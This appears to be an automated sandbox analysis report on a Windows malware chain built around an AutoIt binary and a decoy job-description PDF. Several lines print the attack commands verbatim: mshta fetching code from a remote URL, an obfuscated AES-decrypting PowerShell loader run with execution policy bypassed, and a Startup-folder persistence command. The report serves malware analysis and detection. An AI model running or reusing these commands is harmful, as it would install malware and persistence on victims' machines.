Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00007FF7BB85BC70
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8672A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_00007FF7BB8672A8
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8671F4 FindFirstFileW,FindClose,15_2_00007FF7BB8671F4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00007FF7BB85B7C0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB822F50 FindFirstFileExW,15_2_00007FF7BB822F50
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB86A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,15_2_00007FF7BB86A4F8
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB866428 FindFirstFileW,FindNextFileW,FindClose,15_2_00007FF7BB866428
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB86A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,15_2_00007FF7BB86A350
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB86A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_00007FF7BB86A874
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB801D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,15_2_00007FF7BB801D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000014.00000002.2525206353.0000029EF5DB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: wscript.exe, 0000001A.00000002.2558520550.000002942FFC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000014.00000002.2525206353.0000029EF5DB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\gE]
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB870A00 BlockInput,15_2_00007FF7BB870A00
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7E37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,15_2_00007FF7BB7E37B0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB805BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,15_2_00007FF7BB805BC0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8532F4 LoadLibraryA,GetProcAddress,15_2_00007FF7BB8532F4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB84D408 LookupPrivilegeValueW,GetProcessHeap,HeapFree,15_2_00007FF7BB84D408
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8059C8 SetUnhandledExceptionFilter,15_2_00007FF7BB8059C8
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8057E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00007FF7BB8057E4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB828FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00007FF7BB828FE4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB81AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00007FF7BB81AF58

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB84CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,15_2_00007FF7BB84CE68
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7E37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,15_2_00007FF7BB7E37B0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB859420 SendInput,keybd_event,15_2_00007FF7BB859420
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85D1A4 mouse_event,15_2_00007FF7BB85D1A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/baochuan1"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '5FC32DF1C0FFAB04AD1461E41B34580CF686186BB175883500353248755372D1E74F294A259C979896FEA6271F154228B3BF0D6A9D0D9F6569B9D41A9A3D09A63BCE9C837BE004A6208D93ACB87F6C547277A8C3268B742B3EF6AEA9AEAFEE59C43BF887EB0182FB5943B2947D27E46DFAAD9FE12776123E736F027853F8BC8DFCF554869724A0AA804A9049D9EA7ACBEED4C412BB6C4D4602CFC90CF615287E6C6555C8E0B6CEE3AACB66AFC773E9192903227F0CE014AE4A150CCCE925B6B22D440B7F3E392520613C07711AF2978A272709AFC70BEDE8C3201483207E66D3D483012204164092C58F5895F1B4B38C5CE831D1917AC33B6FF65EBC1F0946D72FFD582B689656A77B66A88C471D7DE4C8AAD142463BAC97A96E31AFC766F1FDD6B3267516F8027B807DBCDA9A77CC0B3EF0AFCA30DAE6A4A90E6590D26CF5960B3F113201E74E50BCC37179E67420FB07540AB18B8A281F6F6E1E0974AB449D8C5426F8776DCAD4AE3752D5ED8DD77E80E582F37E99699AC94D58A627C408F56A6BAB4FF2A4634255575F0A373CE9D4F81D7D85A6FDD69653A9ACD82342A04DE1D703FF55FD77C7093583E7A8DE7DD76FAA4FC7DC3AE525F2923AB6D03FA2CF6E1C0045EB1AE1B01FE2DCE5F0DF7AF916F7F3D8FFFCF35BA8DFEE6863AACCA2AF778D9372C039EF1AA4F66FE4C9A7B7E6B4B690EE8B5F365AFD2B94E0804532372C711FBB3284815793750781C1A32513D741D2441259E82D27F9EDAFE0F914EBC4098FCA1B2028271CE736D3BF191C47416E402EA4570B4E235E7AEE572814275E385B72FBB0EBB4E4A71440B44DF5AD9DD6C30D1FE13CF9470F4635440674E87C75280F2FD7AC139781FEE2CBD3BFB5E93BCAD4DAED74847E6BE4FD41C380DA9D3A7A21A32566CEC4C0BB9EAA0C494BAE968EB32720676452D8771B05F9FBED066BEEC71BED78275BC817D8373317584369A8DD60E296BA3A7576111EB07BB121D2FC9B92A15C9F813BAFBD25A0F89684CBA0692BCA686C8E2C8FC8B185E944941525012042EAF50007E259FC3ECD739FA2F61F6FB8325658A744B3E4DE0CED8D320510C3299CAE545C675E7E88D3B7A101C08FD1C8926471E91C6E79F62B497DD1CC8DD442A85E3C31FEB6E31E75149AA77C8D8B3DFE3CB4D3B9ED06691EE63BC9248DF964984D9E605967CD19AC1E1190D2B1FC8F1C2F12A7615AAF59A39ACFBDC1A5D1067B10A03DE63D10C8C973A264985FB7E40DC8D397B060C3C2144591271FF47D80C0C4EFD88E885F4D18CCA2CED83B8D1BD66297A6F61B3062A0F96F4B4DC0076B70FB8A8DD887142732D4A65A96B6FD7A0352D9488FAFF981B4E138BD5D5E350C18AD7F5DD70FB56686D79B20038823B95E423BC9AD64AA072C87E558C58E9D04720A12E07C3C08A91A0E105DC9FE126B797B360396173D676F52756A6E514D4757514A4D594F475365';function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '5fc32df1c0ffab04ad1461e41b34580cf686186bb175883500353248755372d1e74f294a259c979896fea6271f154228b3bf0d6a9d0d9f6569b9d41a9a3d09a63bce9c837be004a6208d93acb87f6c547277a8c3268b742b3ef6aea9aeafee59c43bf887eb0182fb5943b2947d27e46dfaad9fe12776123e736f027853f8bc8dfcf554869724a0aa804a9049d9ea7acbeed4c412bb6c4d4602cfc90cf615287e6c6555c8e0b6cee3aacb66afc773e9192903227f0ce014ae4a150ccce925b6b22d440b7f3e392520613c07711af2978a272709afc70bede8c3201483207e66d3d483012204164092c58f5895f1b4b38c5ce831d1917ac33b6ff65ebc1f0946d72ffd582b689656a77b66a88c471d7de4c8aad142463bac97a96e31afc766f1fdd6b3267516f8027b807dbcda9a77cc0b3ef0afca30dae6a4a90e6590d26cf5960b3f113201e74e50bcc37179e67420fb07540ab18b8a281f6f6e1e0974ab449d8c5426f8776dcad4ae3752d5ed8dd77e80e582f37e99699ac94d58a627c408f56a6bab4ff2a4634255575f0a373ce9d4f81d7d85a6fdd69653a9acd82342a04de1d703ff55fd77c7093583e7a8de7dd76faa4fc7dc3ae525f2923ab6d03fa2cf6e1c0045eb1ae1b01fe2dce5f0df7af916f7f3d8fffcf35ba8dfee6863aacca2af778d9372c039ef1aa4f66fe4c9a7b7e6b4b690ee8b5f365afd2b94e0804532372c711fbb3284815793750781c1a32513d741d2441259e82d27f9edafe0f914ebc4098fca1b2028271ce736d3bf191c47416e402ea4570b4e235e7aee572814275e385b72fbb0ebb4e4a71440b44df5ad9dd6c30d1fe13cf9470f4635440674e87c75280f2fd7ac139781fee2cbd3bfb5e93bcad4daed74847e6be4fd41c380da9d3a7a21a32566cec4c0bb9eaa0c494bae968eb32720676452d8771b05f9fbed066beec71bed78275bc817d8373317584369a8dd60e296ba3a7576111eb07bb121d2fc9b92a15c9f813bafbd25a0f89684cba0692bca686c8e2c8fc8b185e944941525012042eaf50007e259fc3ecd739fa2f61f6fb8325658a744b3e4de0ced8d320510c3299cae545c675e7e88d3b7a101c08fd1c8926471e91c6e79f62b497dd1cc8dd442a85e3c31feb6e31e75149aa77c8d8b3dfe3cb4d3b9ed06691ee63bc9248df964984d9e605967cd19ac1e1190d2b1fc8f1c2f12a7615aaf59a39acfbdc1a5d1067b10a03de63d10c8c973a264985fb7e40dc8d397b060c3c2144591271ff47d80c0c4efd88e885f4d18cca2ced83b8d1bd66297a6f61b3062a0f96f4b4dc0076b70fb8a8dd887142732d4a65a96b6fd7a0352d9488faff981b4e138bd5d5e350c18ad7f5dd70fb56686d79b20038823b95e423bc9ad64aa072c87e558c58e9d04720a12e07c3c08a91a0e105dc9fe126b797b360396173d676f52756a6e514d4757514a4d594f475365';function vxx ($xhdthlvi){return -split ($xhdthlvi -replace '..', '0x$& ')};$fmaphot = vxx($ddg.substring(0, 2048));$pbl = [system.security.cryptography.aes]::create();$pbl.key = vxx($ddg.substring(2048));$pbl.iv = new-object byte[] 16;$knbwnbh = $pbl.createdecryptor();$njzfzre = [system.string]::new($knbwnbh.transformfinalblock($fmaphot, 0,$fmaphot.length)); sal fd $njzfzre.substring(3,3); fd $njzfzre.substring(6)
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '5fc32df1c0ffab04ad1461e41b34580cf686186bb175883500353248755372d1e74f294a259c979896fea6271f154228b3bf0d6a9d0d9f6569b9d41a9a3d09a63bce9c837be004a6208d93acb87f6c547277a8c3268b742b3ef6aea9aeafee59c43bf887eb0182fb5943b2947d27e46dfaad9fe12776123e736f027853f8bc8dfcf554869724a0aa804a9049d9ea7acbeed4c412bb6c4d4602cfc90cf615287e6c6555c8e0b6cee3aacb66afc773e9192903227f0ce014ae4a150ccce925b6b22d440b7f3e392520613c07711af2978a272709afc70bede8c3201483207e66d3d483012204164092c58f5895f1b4b38c5ce831d1917ac33b6ff65ebc1f0946d72ffd582b689656a77b66a88c471d7de4c8aad142463bac97a96e31afc766f1fdd6b3267516f8027b807dbcda9a77cc0b3ef0afca30dae6a4a90e6590d26cf5960b3f113201e74e50bcc37179e67420fb07540ab18b8a281f6f6e1e0974ab449d8c5426f8776dcad4ae3752d5ed8dd77e80e582f37e99699ac94d58a627c408f56a6bab4ff2a4634255575f0a373ce9d4f81d7d85a6fdd69653a9acd82342a04de1d703ff55fd77c7093583e7a8de7dd76faa4fc7dc3ae525f2923ab6d03fa2cf6e1c0045eb1ae1b01fe2dce5f0df7af916f7f3d8fffcf35ba8dfee6863aacca2af778d9372c039ef1aa4f66fe4c9a7b7e6b4b690ee8b5f365afd2b94e0804532372c711fbb3284815793750781c1a32513d741d2441259e82d27f9edafe0f914ebc4098fca1b2028271ce736d3bf191c47416e402ea4570b4e235e7aee572814275e385b72fbb0ebb4e4a71440b44df5ad9dd6c30d1fe13cf9470f4635440674e87c75280f2fd7ac139781fee2cbd3bfb5e93bcad4daed74847e6be4fd41c380da9d3a7a21a32566cec4c0bb9eaa0c494bae968eb32720676452d8771b05f9fbed066beec71bed78275bc817d8373317584369a8dd60e296ba3a7576111eb07bb121d2fc9b92a15c9f813bafbd25a0f89684cba0692bca686c8e2c8fc8b185e944941525012042eaf50007e259fc3ecd739fa2f61f6fb8325658a744b3e4de0ced8d320510c3299cae545c675e7e88d3b7a101c08fd1c8926471e91c6e79f62b497dd1cc8dd442a85e3c31feb6e31e75149aa77c8d8b3dfe3cb4d3b9ed06691ee63bc9248df964984d9e605967cd19ac1e1190d2b1fc8f1c2f12a7615aaf59a39acfbdc1a5d1067b10a03de63d10c8c973a264985fb7e40dc8d397b060c3c2144591271ff47d80c0c4efd88e885f4d18cca2ced83b8d1bd66297a6f61b3062a0f96f4b4dc0076b70fb8a8dd887142732d4a65a96b6fd7a0352d9488faff981b4e138bd5d5e350c18ad7f5dd70fb56686d79b20038823b95e423bc9ad64aa072c87e558c58e9d04720a12e07c3c08a91a0e105dc9fe126b797b360396173d676f52756a6e514d4757514a4d594f475365';function vxx ($xhdthlvi){return -split ($xhdthlvi -replace '..', '0x$& ')};$fmaphot = vxx($ddg.substring(0, 2048));$pbl = [system.security.cryptography.aes]::create();$pbl.key = vxx($ddg.substring(2048));$pbl.iv = new-object byte[] 16;$knbwnbh = $pbl.createdecryptor();$njzfzre = [system.string]::new($knbwnbh.transformfinalblock($fmaphot, 0,$fmaphot.length)); sal fd $njzfzre.substring(3,3); fd $njzfzre.substring(6)Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB84C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,15_2_00007FF7BB84C858
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB84D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,15_2_00007FF7BB84D540
Source: powershell.exe, 00000008.00000002.3499608749.000002AB9706F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3499608749.000002AB972FF000.00000004.00000800.00020000.00000000.sdmp, rMpqCJnPv.exe, 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: rMpqCJnPv.exeBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB81FD20 cpuid 15_2_00007FF7BB81FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
